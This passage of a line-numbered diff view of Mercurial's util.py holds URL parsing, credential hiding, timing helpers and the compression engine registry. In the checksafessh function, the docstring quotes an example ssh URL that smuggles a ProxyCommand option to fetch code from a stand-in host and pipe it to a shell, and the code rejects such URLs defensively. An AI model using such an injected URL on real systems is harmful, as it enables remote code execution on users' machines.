2746 2746 If port is an integer, it's returned as is. If it's a string, it's
2747 2747 looked up using socket.getservbyname(). If there's no matching
2748 2748 service, error.Abort is raised.
2749 2749 """
2750 2750 try:
2751 2751 return int(port)
2752 2752 except ValueError:
2753 2753 pass
2754 2754
2755 2755 try:
2756 2756 return socket.getservbyname(pycompat.sysstr(port))
2757 2757 except socket.error:
2758 2758 raise Abort(_("no port number associated with service '%s'") % port)
2759 2759
2760 2760 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2761 2761 '0': False, 'no': False, 'false': False, 'off': False,
2762 2762 'never': False}
2763 2763
2764 2764 def parsebool(s):
2765 2765 """Parse s into a boolean.
2766 2766
2767 2767 If s is not a valid boolean, returns None.
2768 2768 """
2769 2769 return _booleans.get(s.lower(), None)
2770 2770
2771 2771 _hextochr = dict((a + b, chr(int(a + b, 16)))
2772 2772 for a in string.hexdigits for b in string.hexdigits)
2773 2773
2774 2774 class url(object):
2775 2775 r"""Reliable URL parser.
2776 2776
2777 2777 This parses URLs and provides attributes for the following
2778 2778 components:
2779 2779
2780 2780 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2781 2781
2782 2782 Missing components are set to None. The only exception is
2783 2783 fragment, which is set to '' if present but empty.
2784 2784
2785 2785 If parsefragment is False, fragment is included in query. If
2786 2786 parsequery is False, query is included in path. If both are
2787 2787 False, both fragment and query are included in path.
2788 2788
2789 2789 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2790 2790
2791 2791 Note that for backward compatibility reasons, bundle URLs do not
2792 2792 take host names. That means 'bundle://../' has a path of '../'.
2793 2793
2794 2794 Examples:
2795 2795
2796 2796 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2797 2797 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2798 2798 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2799 2799 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2800 2800 >>> url(b'file:///home/joe/repo')
2801 2801 <url scheme: 'file', path: '/home/joe/repo'>
2802 2802 >>> url(b'file:///c:/temp/foo/')
2803 2803 <url scheme: 'file', path: 'c:/temp/foo/'>
2804 2804 >>> url(b'bundle:foo')
2805 2805 <url scheme: 'bundle', path: 'foo'>
2806 2806 >>> url(b'bundle://../foo')
2807 2807 <url scheme: 'bundle', path: '../foo'>
2808 2808 >>> url(br'c:\foo\bar')
2809 2809 <url path: 'c:\\foo\\bar'>
2810 2810 >>> url(br'\\blah\blah\blah')
2811 2811 <url path: '\\\\blah\\blah\\blah'>
2812 2812 >>> url(br'\\blah\blah\blah#baz')
2813 2813 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2814 2814 >>> url(br'file:///C:\users\me')
2815 2815 <url scheme: 'file', path: 'C:\\users\\me'>
2816 2816
2817 2817 Authentication credentials:
2818 2818
2819 2819 >>> url(b'ssh://joe:xyz@x/repo')
2820 2820 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2821 2821 >>> url(b'ssh://joe@x/repo')
2822 2822 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2823 2823
2824 2824 Query strings and fragments:
2825 2825
2826 2826 >>> url(b'http://host/a?b#c')
2827 2827 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2828 2828 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2829 2829 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2830 2830
2831 2831 Empty path:
2832 2832
2833 2833 >>> url(b'')
2834 2834 <url path: ''>
2835 2835 >>> url(b'#a')
2836 2836 <url path: '', fragment: 'a'>
2837 2837 >>> url(b'http://host/')
2838 2838 <url scheme: 'http', host: 'host', path: ''>
2839 2839 >>> url(b'http://host/#a')
2840 2840 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2841 2841
2842 2842 Only scheme:
2843 2843
2844 2844 >>> url(b'http:')
2845 2845 <url scheme: 'http'>
2846 2846 """
2847 2847
2848 2848 _safechars = "!~*'()+"
2849 2849 _safepchars = "/!~*'()+:\\"
2850 2850 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2851 2851
2852 2852 def __init__(self, path, parsequery=True, parsefragment=True):
2853 2853 # We slowly chomp away at path until we have only the path left
2854 2854 self.scheme = self.user = self.passwd = self.host = None
2855 2855 self.port = self.path = self.query = self.fragment = None
2856 2856 self._localpath = True
2857 2857 self._hostport = ''
2858 2858 self._origpath = path
2859 2859
2860 2860 if parsefragment and '#' in path:
2861 2861 path, self.fragment = path.split('#', 1)
2862 2862
2863 2863 # special case for Windows drive letters and UNC paths
2864 2864 if hasdriveletter(path) or path.startswith('\\\\'):
2865 2865 self.path = path
2866 2866 return
2867 2867
2868 2868 # For compatibility reasons, we can't handle bundle paths as
2869 2869 # normal URLS
2870 2870 if path.startswith('bundle:'):
2871 2871 self.scheme = 'bundle'
2872 2872 path = path[7:]
2873 2873 if path.startswith('//'):
2874 2874 path = path[2:]
2875 2875 self.path = path
2876 2876 return
2877 2877
2878 2878 if self._matchscheme(path):
2879 2879 parts = path.split(':', 1)
2880 2880 if parts[0]:
2881 2881 self.scheme, path = parts
2882 2882 self._localpath = False
2883 2883
2884 2884 if not path:
2885 2885 path = None
2886 2886 if self._localpath:
2887 2887 self.path = ''
2888 2888 return
2889 2889 else:
2890 2890 if self._localpath:
2891 2891 self.path = path
2892 2892 return
2893 2893
2894 2894 if parsequery and '?' in path:
2895 2895 path, self.query = path.split('?', 1)
2896 2896 if not path:
2897 2897 path = None
2898 2898 if not self.query:
2899 2899 self.query = None
2900 2900
2901 2901 # // is required to specify a host/authority
2902 2902 if path and path.startswith('//'):
2903 2903 parts = path[2:].split('/', 1)
2904 2904 if len(parts) > 1:
2905 2905 self.host, path = parts
2906 2906 else:
2907 2907 self.host = parts[0]
2908 2908 path = None
2909 2909 if not self.host:
2910 2910 self.host = None
2911 2911 # path of file:///d is /d
2912 2912 # path of file:///d:/ is d:/, not /d:/
2913 2913 if path and not hasdriveletter(path):
2914 2914 path = '/' + path
2915 2915
2916 2916 if self.host and '@' in self.host:
2917 2917 self.user, self.host = self.host.rsplit('@', 1)
2918 2918 if ':' in self.user:
2919 2919 self.user, self.passwd = self.user.split(':', 1)
2920 2920 if not self.host:
2921 2921 self.host = None
2922 2922
2923 2923 # Don't split on colons in IPv6 addresses without ports
2924 2924 if (self.host and ':' in self.host and
2925 2925 not (self.host.startswith('[') and self.host.endswith(']'))):
2926 2926 self._hostport = self.host
2927 2927 self.host, self.port = self.host.rsplit(':', 1)
2928 2928 if not self.host:
2929 2929 self.host = None
2930 2930
2931 2931 if (self.host and self.scheme == 'file' and
2932 2932 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2933 2933 raise Abort(_('file:// URLs can only refer to localhost'))
2934 2934
2935 2935 self.path = path
2936 2936
2937 2937 # leave the query string escaped
2938 2938 for a in ('user', 'passwd', 'host', 'port',
2939 2939 'path', 'fragment'):
2940 2940 v = getattr(self, a)
2941 2941 if v is not None:
2942 2942 setattr(self, a, urlreq.unquote(v))
2943 2943
2944 2944 @encoding.strmethod
2945 2945 def __repr__(self):
2946 2946 attrs = []
2947 2947 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2948 2948 'query', 'fragment'):
2949 2949 v = getattr(self, a)
2950 2950 if v is not None:
2951 2951 attrs.append('%s: %r' % (a, v))
2952 2952 return '<url %s>' % ', '.join(attrs)
2953 2953
2954 2954 def __bytes__(self):
2955 2955 r"""Join the URL's components back into a URL string.
2956 2956
2957 2957 Examples:
2958 2958
2959 2959 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2960 2960 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2961 2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2962 2962 'http://user:pw@host:80/?foo=bar&baz=42'
2963 2963 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2964 2964 'http://user:pw@host:80/?foo=bar%3dbaz'
2965 2965 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2966 2966 'ssh://user:pw@[::1]:2200//home/joe#'
2967 2967 >>> bytes(url(b'http://localhost:80//'))
2968 2968 'http://localhost:80//'
2969 2969 >>> bytes(url(b'http://localhost:80/'))
2970 2970 'http://localhost:80/'
2971 2971 >>> bytes(url(b'http://localhost:80'))
2972 2972 'http://localhost:80/'
2973 2973 >>> bytes(url(b'bundle:foo'))
2974 2974 'bundle:foo'
2975 2975 >>> bytes(url(b'bundle://../foo'))
2976 2976 'bundle:../foo'
2977 2977 >>> bytes(url(b'path'))
2978 2978 'path'
2979 2979 >>> bytes(url(b'file:///tmp/foo/bar'))
2980 2980 'file:///tmp/foo/bar'
2981 2981 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2982 2982 'file:///c:/tmp/foo/bar'
2983 2983 >>> print(url(br'bundle:foo\bar'))
2984 2984 bundle:foo\bar
2985 2985 >>> print(url(br'file:///D:\data\hg'))
2986 2986 file:///D:\data\hg
2987 2987 """
2988 2988 if self._localpath:
2989 2989 s = self.path
2990 2990 if self.scheme == 'bundle':
2991 2991 s = 'bundle:' + s
2992 2992 if self.fragment:
2993 2993 s += '#' + self.fragment
2994 2994 return s
2995 2995
2996 2996 s = self.scheme + ':'
2997 2997 if self.user or self.passwd or self.host:
2998 2998 s += '//'
2999 2999 elif self.scheme and (not self.path or self.path.startswith('/')
3000 3000 or hasdriveletter(self.path)):
3001 3001 s += '//'
3002 3002 if hasdriveletter(self.path):
3003 3003 s += '/'
3004 3004 if self.user:
3005 3005 s += urlreq.quote(self.user, safe=self._safechars)
3006 3006 if self.passwd:
3007 3007 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3008 3008 if self.user or self.passwd:
3009 3009 s += '@'
3010 3010 if self.host:
3011 3011 if not (self.host.startswith('[') and self.host.endswith(']')):
3012 3012 s += urlreq.quote(self.host)
3013 3013 else:
3014 3014 s += self.host
3015 3015 if self.port:
3016 3016 s += ':' + urlreq.quote(self.port)
3017 3017 if self.host:
3018 3018 s += '/'
3019 3019 if self.path:
3020 3020 # TODO: similar to the query string, we should not unescape the
3021 3021 # path when we store it, the path might contain '%2f' = '/',
3022 3022 # which we should *not* escape.
3023 3023 s += urlreq.quote(self.path, safe=self._safepchars)
3024 3024 if self.query:
3025 3025 # we store the query in escaped form.
3026 3026 s += '?' + self.query
3027 3027 if self.fragment is not None:
3028 3028 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3029 3029 return s
3030 3030
3031 3031 __str__ = encoding.strmethod(__bytes__)
3032 3032
3033 3033 def authinfo(self):
3034 3034 user, passwd = self.user, self.passwd
3035 3035 try:
3036 3036 self.user, self.passwd = None, None
3037 3037 s = bytes(self)
3038 3038 finally:
3039 3039 self.user, self.passwd = user, passwd
3040 3040 if not self.user:
3041 3041 return (s, None)
3042 3042 # authinfo[1] is passed to urllib2 password manager, and its
3043 3043 # URIs must not contain credentials. The host is passed in the
3044 3044 # URIs list because Python < 2.4.3 uses only that to search for
3045 3045 # a password.
3046 3046 return (s, (None, (s, self.host),
3047 3047 self.user, self.passwd or ''))
3048 3048
3049 3049 def isabs(self):
3050 3050 if self.scheme and self.scheme != 'file':
3051 3051 return True # remote URL
3052 3052 if hasdriveletter(self.path):
3053 3053 return True # absolute for our purposes - can't be joined()
3054 3054 if self.path.startswith(br'\\'):
3055 3055 return True # Windows UNC path
3056 3056 if self.path.startswith('/'):
3057 3057 return True # POSIX-style
3058 3058 return False
3059 3059
3060 3060 def localpath(self):
3061 3061 if self.scheme == 'file' or self.scheme == 'bundle':
3062 3062 path = self.path or '/'
3063 3063 # For Windows, we need to promote hosts containing drive
3064 3064 # letters to paths with drive letters.
3065 3065 if hasdriveletter(self._hostport):
3066 3066 path = self._hostport + '/' + self.path
3067 3067 elif (self.host is not None and self.path
3068 3068 and not hasdriveletter(path)):
3069 3069 path = '/' + path
3070 3070 return path
3071 3071 return self._origpath
3072 3072
3073 3073 def islocal(self):
3074 3074 '''whether localpath will return something that posixfile can open'''
3075 3075 return (not self.scheme or self.scheme == 'file'
3076 3076 or self.scheme == 'bundle')
3077 3077
3078 3078 def hasscheme(path):
3079 3079 return bool(url(path).scheme)
3080 3080
3081 3081 def hasdriveletter(path):
3082 3082 return path and path[1:2] == ':' and path[0:1].isalpha()
3083 3083
3084 3084 def urllocalpath(path):
3085 3085 return url(path, parsequery=False, parsefragment=False).localpath()
3086 3086
3087 3087 def checksafessh(path):
3088 3088 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3089 3089
3090 3090 This is a sanity check for ssh urls. ssh will parse the first item as
3091 3091 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3092 3092 Let's prevent these potentially exploited urls entirely and warn the
3093 3093 user.
3094 3094
3095 3095 Raises an error.Abort when the url is unsafe.
3096 3096 """
3097 3097 path = urlreq.unquote(path)
3098 3098 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3099 3099 raise error.Abort(_('potentially unsafe url: %r') %
3100 (path,))
3100 (pycompat.bytestr(path),))
3101 3101
3102 3102 def hidepassword(u):
3103 3103 '''hide user credential in a url string'''
3104 3104 u = url(u)
3105 3105 if u.passwd:
3106 3106 u.passwd = '***'
3107 3107 return bytes(u)
3108 3108
3109 3109 def removeauth(u):
3110 3110 '''remove all authentication information from a url string'''
3111 3111 u = url(u)
3112 3112 u.user = u.passwd = None
3113 3113 return str(u)
3114 3114
3115 3115 timecount = unitcountfn(
3116 3116 (1, 1e3, _('%.0f s')),
3117 3117 (100, 1, _('%.1f s')),
3118 3118 (10, 1, _('%.2f s')),
3119 3119 (1, 1, _('%.3f s')),
3120 3120 (100, 0.001, _('%.1f ms')),
3121 3121 (10, 0.001, _('%.2f ms')),
3122 3122 (1, 0.001, _('%.3f ms')),
3123 3123 (100, 0.000001, _('%.1f us')),
3124 3124 (10, 0.000001, _('%.2f us')),
3125 3125 (1, 0.000001, _('%.3f us')),
3126 3126 (100, 0.000000001, _('%.1f ns')),
3127 3127 (10, 0.000000001, _('%.2f ns')),
3128 3128 (1, 0.000000001, _('%.3f ns')),
3129 3129 )
3130 3130
3131 3131 _timenesting = [0]
3132 3132
3133 3133 def timed(func):
3134 3134 '''Report the execution time of a function call to stderr.
3135 3135
3136 3136 During development, use as a decorator when you need to measure
3137 3137 the cost of a function, e.g. as follows:
3138 3138
3139 3139 @util.timed
3140 3140 def foo(a, b, c):
3141 3141 pass
3142 3142 '''
3143 3143
3144 3144 def wrapper(*args, **kwargs):
3145 3145 start = timer()
3146 3146 indent = 2
3147 3147 _timenesting[0] += indent
3148 3148 try:
3149 3149 return func(*args, **kwargs)
3150 3150 finally:
3151 3151 elapsed = timer() - start
3152 3152 _timenesting[0] -= indent
3153 3153 stderr.write('%s%s: %s\n' %
3154 3154 (' ' * _timenesting[0], func.__name__,
3155 3155 timecount(elapsed)))
3156 3156 return wrapper
3157 3157
3158 3158 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3159 3159 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3160 3160
3161 3161 def sizetoint(s):
3162 3162 '''Convert a space specifier to a byte count.
3163 3163
3164 3164 >>> sizetoint(b'30')
3165 3165 30
3166 3166 >>> sizetoint(b'2.2kb')
3167 3167 2252
3168 3168 >>> sizetoint(b'6M')
3169 3169 6291456
3170 3170 '''
3171 3171 t = s.strip().lower()
3172 3172 try:
3173 3173 for k, u in _sizeunits:
3174 3174 if t.endswith(k):
3175 3175 return int(float(t[:-len(k)]) * u)
3176 3176 return int(t)
3177 3177 except ValueError:
3178 3178 raise error.ParseError(_("couldn't parse size: %s") % s)
3179 3179
3180 3180 class hooks(object):
3181 3181 '''A collection of hook functions that can be used to extend a
3182 3182 function's behavior. Hooks are called in lexicographic order,
3183 3183 based on the names of their sources.'''
3184 3184
3185 3185 def __init__(self):
3186 3186 self._hooks = []
3187 3187
3188 3188 def add(self, source, hook):
3189 3189 self._hooks.append((source, hook))
3190 3190
3191 3191 def __call__(self, *args):
3192 3192 self._hooks.sort(key=lambda x: x[0])
3193 3193 results = []
3194 3194 for source, hook in self._hooks:
3195 3195 results.append(hook(*args))
3196 3196 return results
3197 3197
3198 3198 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3199 3199 '''Yields lines for a nicely formatted stacktrace.
3200 3200 Skips the 'skip' last entries, then return the last 'depth' entries.
3201 3201 Each file+linenumber is formatted according to fileline.
3202 3202 Each line is formatted according to line.
3203 3203 If line is None, it yields:
3204 3204 length of longest filepath+line number,
3205 3205 filepath+linenumber,
3206 3206 function
3207 3207
3208 3208 Not be used in production code but very convenient while developing.
3209 3209 '''
3210 3210 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3211 3211 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3212 3212 ][-depth:]
3213 3213 if entries:
3214 3214 fnmax = max(len(entry[0]) for entry in entries)
3215 3215 for fnln, func in entries:
3216 3216 if line is None:
3217 3217 yield (fnmax, fnln, func)
3218 3218 else:
3219 3219 yield line % (fnmax, fnln, func)
3220 3220
3221 3221 def debugstacktrace(msg='stacktrace', skip=0,
3222 3222 f=stderr, otherf=stdout, depth=0):
3223 3223 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3224 3224 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3225 3225 By default it will flush stdout first.
3226 3226 It can be used everywhere and intentionally does not require an ui object.
3227 3227 Not be used in production code but very convenient while developing.
3228 3228 '''
3229 3229 if otherf:
3230 3230 otherf.flush()
3231 3231 f.write('%s at:\n' % msg.rstrip())
3232 3232 for line in getstackframes(skip + 1, depth=depth):
3233 3233 f.write(line)
3234 3234 f.flush()
3235 3235
3236 3236 class dirs(object):
3237 3237 '''a multiset of directory names from a dirstate or manifest'''
3238 3238
3239 3239 def __init__(self, map, skip=None):
3240 3240 self._dirs = {}
3241 3241 addpath = self.addpath
3242 3242 if safehasattr(map, 'iteritems') and skip is not None:
3243 3243 for f, s in map.iteritems():
3244 3244 if s[0] != skip:
3245 3245 addpath(f)
3246 3246 else:
3247 3247 for f in map:
3248 3248 addpath(f)
3249 3249
3250 3250 def addpath(self, path):
3251 3251 dirs = self._dirs
3252 3252 for base in finddirs(path):
3253 3253 if base in dirs:
3254 3254 dirs[base] += 1
3255 3255 return
3256 3256 dirs[base] = 1
3257 3257
3258 3258 def delpath(self, path):
3259 3259 dirs = self._dirs
3260 3260 for base in finddirs(path):
3261 3261 if dirs[base] > 1:
3262 3262 dirs[base] -= 1
3263 3263 return
3264 3264 del dirs[base]
3265 3265
3266 3266 def __iter__(self):
3267 3267 return iter(self._dirs)
3268 3268
3269 3269 def __contains__(self, d):
3270 3270 return d in self._dirs
3271 3271
3272 3272 if safehasattr(parsers, 'dirs'):
3273 3273 dirs = parsers.dirs
3274 3274
3275 3275 def finddirs(path):
3276 3276 pos = path.rfind('/')
3277 3277 while pos != -1:
3278 3278 yield path[:pos]
3279 3279 pos = path.rfind('/', 0, pos)
3280 3280
3281 3281 # compression code
3282 3282
3283 3283 SERVERROLE = 'server'
3284 3284 CLIENTROLE = 'client'
3285 3285
3286 3286 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3287 3287 (u'name', u'serverpriority',
3288 3288 u'clientpriority'))
3289 3289
3290 3290 class compressormanager(object):
3291 3291 """Holds registrations of various compression engines.
3292 3292
3293 3293 This class essentially abstracts the differences between compression
3294 3294 engines to allow new compression formats to be added easily, possibly from
3295 3295 extensions.
3296 3296
3297 3297 Compressors are registered against the global instance by calling its
3298 3298 ``register()`` method.
3299 3299 """
3300 3300 def __init__(self):
3301 3301 self._engines = {}
3302 3302 # Bundle spec human name to engine name.
3303 3303 self._bundlenames = {}
3304 3304 # Internal bundle identifier to engine name.
3305 3305 self._bundletypes = {}
3306 3306 # Revlog header to engine name.
3307 3307 self._revlogheaders = {}
3308 3308 # Wire proto identifier to engine name.
3309 3309 self._wiretypes = {}
3310 3310
3311 3311 def __getitem__(self, key):
3312 3312 return self._engines[key]
3313 3313
3314 3314 def __contains__(self, key):
3315 3315 return key in self._engines
3316 3316
3317 3317 def __iter__(self):
3318 3318 return iter(self._engines.keys())
3319 3319
3320 3320 def register(self, engine):
3321 3321 """Register a compression engine with the manager.
3322 3322
3323 3323 The argument must be a ``compressionengine`` instance.
3324 3324 """
3325 3325 if not isinstance(engine, compressionengine):
3326 3326 raise ValueError(_('argument must be a compressionengine'))
3327 3327
3328 3328 name = engine.name()
3329 3329
3330 3330 if name in self._engines:
3331 3331 raise error.Abort(_('compression engine %s already registered') %
3332 3332 name)
3333 3333
3334 3334 bundleinfo = engine.bundletype()
3335 3335 if bundleinfo:
3336 3336 bundlename, bundletype = bundleinfo
3337 3337
3338 3338 if bundlename in self._bundlenames:
3339 3339 raise error.Abort(_('bundle name %s already registered') %
3340 3340 bundlename)
3341 3341 if bundletype in self._bundletypes:
3342 3342 raise error.Abort(_('bundle type %s already registered by %s') %
3343 3343 (bundletype, self._bundletypes[bundletype]))
3344 3344
3345 3345 # No external facing name declared.
3346 3346 if bundlename:
3347 3347 self._bundlenames[bundlename] = name
3348 3348
3349 3349 self._bundletypes[bundletype] = name
3350 3350
3351 3351 wiresupport = engine.wireprotosupport()
3352 3352 if wiresupport:
3353 3353 wiretype = wiresupport.name
3354 3354 if wiretype in self._wiretypes:
3355 3355 raise error.Abort(_('wire protocol compression %s already '
3356 3356 'registered by %s') %
3357 3357 (wiretype, self._wiretypes[wiretype]))
3358 3358
3359 3359 self._wiretypes[wiretype] = name
3360 3360
3361 3361 revlogheader = engine.revlogheader()
3362 3362 if revlogheader and revlogheader in self._revlogheaders:
3363 3363 raise error.Abort(_('revlog header %s already registered by %s') %
3364 3364 (revlogheader, self._revlogheaders[revlogheader]))
3365 3365
3366 3366 if revlogheader:
3367 3367 self._revlogheaders[revlogheader] = name
3368 3368
3369 3369 self._engines[name] = engine
3370 3370
3371 3371 @property
3372 3372 def supportedbundlenames(self):
3373 3373 return set(self._bundlenames.keys())
3374 3374
3375 3375 @property
3376 3376 def supportedbundletypes(self):
3377 3377 return set(self._bundletypes.keys())
3378 3378
3379 3379 def forbundlename(self, bundlename):
3380 3380 """Obtain a compression engine registered to a bundle name.
3381 3381
3382 3382 Will raise KeyError if the bundle type isn't registered.
3383 3383
3384 3384 Will abort if the engine is known but not available.
3385 3385 """
3386 3386 engine = self._engines[self._bundlenames[bundlename]]
3387 3387 if not engine.available():
3388 3388 raise error.Abort(_('compression engine %s could not be loaded') %
3389 3389 engine.name())
3390 3390 return engine
3391 3391
3392 3392 def forbundletype(self, bundletype):
3393 3393 """Obtain a compression engine registered to a bundle type.
3394 3394
3395 3395 Will raise KeyError if the bundle type isn't registered.
3396 3396
3397 3397 Will abort if the engine is known but not available.
3398 3398 """
3399 3399 engine = self._engines[self._bundletypes[bundletype]]
3400 3400 if not engine.available():
3401 3401 raise error.Abort(_('compression engine %s could not be loaded') %
3402 3402 engine.name())
3403 3403 return engine
3404 3404
3405 3405 def supportedwireengines(self, role, onlyavailable=True):
3406 3406 """Obtain compression engines that support the wire protocol.
3407 3407
3408 3408 Returns a list of engines in prioritized order, most desired first.
3409 3409
3410 3410 If ``onlyavailable`` is set, filter out engines that can't be
3411 3411 loaded.
3412 3412 """
3413 3413 assert role in (SERVERROLE, CLIENTROLE)
3414 3414
3415 3415 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3416 3416
3417 3417 engines = [self._engines[e] for e in self._wiretypes.values()]
3418 3418 if onlyavailable:
3419 3419 engines = [e for e in engines if e.available()]
3420 3420
3421 3421 def getkey(e):
3422 3422 # Sort first by priority, highest first. In case of tie, sort
3423 3423 # alphabetically. This is arbitrary, but ensures output is
3424 3424 # stable.
3425 3425 w = e.wireprotosupport()
3426 3426 return -1 * getattr(w, attr), w.name
3427 3427
3428 3428 return list(sorted(engines, key=getkey))
3429 3429
3430 3430 def forwiretype(self, wiretype):
3431 3431 engine = self._engines[self._wiretypes[wiretype]]
3432 3432 if not engine.available():
3433 3433 raise error.Abort(_('compression engine %s could not be loaded') %
3434 3434 engine.name())
3435 3435 return engine
3436 3436
3437 3437 def forrevlogheader(self, header):
3438 3438 """Obtain a compression engine registered to a revlog header.
3439 3439
3440 3440 Will raise KeyError if the revlog header value isn't registered.
3441 3441 """
3442 3442 return self._engines[self._revlogheaders[header]]
3443 3443
3444 3444 compengines = compressormanager()
3445 3445
3446 3446 class compressionengine(object):
3447 3447 """Base class for compression engines.
3448 3448
3449 3449 Compression engines must implement the interface defined by this class.
3450 3450 """
3451 3451 def name(self):
3452 3452 """Returns the name of the compression engine.
3453 3453
3454 3454 This is the key the engine is registered under.
3455 3455
3456 3456 This method must be implemented.
3457 3457 """
3458 3458 raise NotImplementedError()
3459 3459
3460 3460 def available(self):
3461 3461 """Whether the compression engine is available.
3462 3462
3463 3463 The intent of this method is to allow optional compression engines
3464 3464 that may not be available in all installations (such as engines relying
3465 3465 on C extensions that may not be present).
3466 3466 """
3467 3467 return True
3468 3468
3469 3469 def bundletype(self):
3470 3470 """Describes bundle identifiers for this engine.
3471 3471
3472 3472 If this compression engine isn't supported for bundles, returns None.
3473 3473
3474 3474 If this engine can be used for bundles, returns a 2-tuple of strings of
3475 3475 the user-facing "bundle spec" compression name and an internal
3476 3476 identifier used to denote the compression format within bundles. To
3477 3477 exclude the name from external usage, set the first element to ``None``.
3478 3478
3479 3479 If bundle compression is supported, the class must also implement
3480 3480 ``compressstream`` and `decompressorreader``.
3481 3481
3482 3482 The docstring of this method is used in the help system to tell users
3483 3483 about this engine.
3484 3484 """
3485 3485 return None
3486 3486
3487 3487 def wireprotosupport(self):
3488 3488 """Declare support for this compression format on the wire protocol.
3489 3489
3490 3490 If this compression engine isn't supported for compressing wire
3491 3491 protocol payloads, returns None.
3492 3492
3493 3493 Otherwise, returns ``compenginewireprotosupport`` with the following
3494 3494 fields:
3495 3495
3496 3496 * String format identifier
3497 3497 * Integer priority for the server
3498 3498 * Integer priority for the client
3499 3499
3500 3500 The integer priorities are used to order the advertisement of format
3501 3501 support by server and client. The highest integer is advertised
3502 3502 first. Integers with non-positive values aren't advertised.
3503 3503
3504 3504 The priority values are somewhat arbitrary and only used for default
3505 3505 ordering. The relative order can be changed via config options.
3506 3506
3507 3507 If wire protocol compression is supported, the class must also implement
3508 3508 ``compressstream`` and ``decompressorreader``.
3509 3509 """
3510 3510 return None
3511 3511
3512 3512 def revlogheader(self):
3513 3513 """Header added to revlog chunks that identifies this engine.
3514 3514
3515 3515 If this engine can be used to compress revlogs, this method should
3516 3516 return the bytes used to identify chunks compressed with this engine.
3517 3517 Else, the method should return ``None`` to indicate it does not
3518 3518 participate in revlog compression.
3519 3519 """
3520 3520 return None
3521 3521
3522 3522 def compressstream(self, it, opts=None):
3523 3523 """Compress an iterator of chunks.
3524 3524
3525 3525 The method receives an iterator (ideally a generator) of chunks of
3526 3526 bytes to be compressed. It returns an iterator (ideally a generator)
3527 3527 of bytes of chunks representing the compressed output.
3528 3528
3529 3529 Optionally accepts an argument defining how to perform compression.
3530 3530 Each engine treats this argument differently.
3531 3531 """
3532 3532 raise NotImplementedError()
3533 3533
3534 3534 def decompressorreader(self, fh):
3535 3535 """Perform decompression on a file object.
3536 3536
3537 3537 Argument is an object with a ``read(size)`` method that returns
3538 3538 compressed data. Return value is an object with a ``read(size)`` that
3539 3539 returns uncompressed data.
3540 3540 """
3541 3541 raise NotImplementedError()
3542 3542
3543 3543 def revlogcompressor(self, opts=None):
3544 3544 """Obtain an object that can be used to compress revlog entries.
3545 3545
3546 3546 The object has a ``compress(data)`` method that compresses binary
3547 3547 data. This method returns compressed binary data or ``None`` if
3548 3548 the data could not be compressed (too small, not compressible, etc).
3549 3549 The returned data should have a header uniquely identifying this
3550 3550 compression format so decompression can be routed to this engine.
3551 3551 This header should be identified by the ``revlogheader()`` return
3552 3552 value.
3553 3553
3554 3554 The object has a ``decompress(data)`` method that decompresses
3555 3555 data. The method will only be called if ``data`` begins with
3556 3556 ``revlogheader()``. The method should return the raw, uncompressed
3557 3557 data or raise a ``RevlogError``.
3558 3558
3559 3559 The object is reusable but is not thread safe.
3560 3560 """
3561 3561 raise NotImplementedError()
3562 3562
3563 3563 class _zlibengine(compressionengine):
3564 3564 def name(self):
3565 3565 return 'zlib'
3566 3566
3567 3567 def bundletype(self):
3568 3568 """zlib compression using the DEFLATE algorithm.
3569 3569
3570 3570 All Mercurial clients should support this format. The compression
3571 3571 algorithm strikes a reasonable balance between compression ratio
3572 3572 and size.
3573 3573 """
3574 3574 return 'gzip', 'GZ'
3575 3575
3576 3576 def wireprotosupport(self):
3577 3577 return compewireprotosupport('zlib', 20, 20)
3578 3578
3579 3579 def revlogheader(self):
3580 3580 return 'x'
3581 3581
3582 3582 def compressstream(self, it, opts=None):
3583 3583 opts = opts or {}
3584 3584
3585 3585 z = zlib.compressobj(opts.get('level', -1))
3586 3586 for chunk in it:
3587 3587 data = z.compress(chunk)
3588 3588 # Not all calls to compress emit data. It is cheaper to inspect
3589 3589 # here than to feed empty chunks through generator.
3590 3590 if data:
3591 3591 yield data
3592 3592
3593 3593 yield z.flush()
3594 3594
3595 3595 def decompressorreader(self, fh):
3596 3596 def gen():
3597 3597 d = zlib.decompressobj()
3598 3598 for chunk in filechunkiter(fh):
3599 3599 while chunk:
3600 3600 # Limit output size to limit memory.
3601 3601 yield d.decompress(chunk, 2 ** 18)
